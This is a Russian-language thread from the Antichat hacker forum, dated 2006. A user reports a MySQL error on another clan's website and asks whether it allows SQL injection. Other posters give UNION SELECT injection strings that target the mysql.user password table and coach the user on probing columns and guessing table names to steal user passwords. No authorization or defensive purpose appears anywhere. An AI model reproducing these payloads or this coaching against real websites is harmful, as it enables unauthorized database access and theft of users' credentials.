Форум АНТИЧАТ - дЫРА ли это?

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - дЫРА ли это? (https://forum.antichat.xyz/showthread.php?t=20087)

temon

03.06.2006 12:11

дЫРА ли это?

пРИВЕТ всем.
Тут на сайте одного из кланов БК нашел вот что.
Если сделать запрос на статью:
newsid='
то вылазит:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

sql-injection можно провести с помошью этого?

SanyaX

03.06.2006 12:14

Хм а что ты нас то спрашиваешь. Ты сам не пробовал. Попробуй провести такой запрос

Код:

+union+select+1,2,user,password,5,6+from+mysql.user/*

Если скажет acces denied то 100% скуль. Вот тебе статьи если что по скулям.
http://www.forum.antichat.ru/thread19684.html
http://www.forum.antichat.ru/thread19605.html

temon

03.06.2006 12:28

спасибо. проверю

temon

03.06.2006 12:58

ура!!!
сделал запрос:
-1+union+select+1,2,3,4,5/*
прокатило все.
а как дальше строить запрос. помогите пожалуйста.
да вот вытянул название бд и юзера.
но не получаетсяс помошью этого:
-1+union+select+1,2,user,password,5+from+mysql.us er/*
вытянусть пасс

temon

04.06.2006 07:27

мне кто нить поможет в конце концов?

K[o]S

04.06.2006 09:36

Нет прав на доступ к базе mysql .

Utochka

04.06.2006 10:38

подбирай названия таблиц и столбцов, чтобы спереть пассы юзверей.

Об sql можешь почитать тут ->->-> http://xzone.org.ru/index.php?name=Pages&op=page&pid=56

SanyaX

04.06.2006 10:58

-1+union+select+1,2,user,password,5+from+mysql.user/*
Пропиши и дай лог что выдала страница.

temon

04.06.2006 20:12

ничего не выдала.
точнее то что и при простом ошибочном запросе.
даже столбцов нету
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

Время: 09:22